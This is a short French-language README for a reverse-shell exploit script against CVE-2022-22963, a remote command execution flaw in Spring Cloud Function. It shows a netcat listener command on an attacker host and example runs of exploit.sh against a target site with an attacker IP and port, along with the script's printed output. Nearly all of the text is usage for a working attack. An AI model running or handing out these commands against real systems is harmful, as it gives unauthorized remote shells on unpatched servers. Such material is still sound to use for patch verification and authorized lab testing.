
Exploit pour l'exécution de commande à distance CVE-2022-22963 dans Spring Cloud Function
Exploit pour CVE-2022-22963 exécution de commandes à distance dans Spring Cloud Function
Voir les détails de la vulnérabilité ici et ici
Lancez netcat sur votre hôte :
$ nc -lvnp 9001
Exécutez l'exploit (exemple) avec le port par défaut 9001 sur l'hôte attaquant :
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done
Exécutez l'exploit (exemple) avec le port spécifié 1337 sur l'hôte attaquant :
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done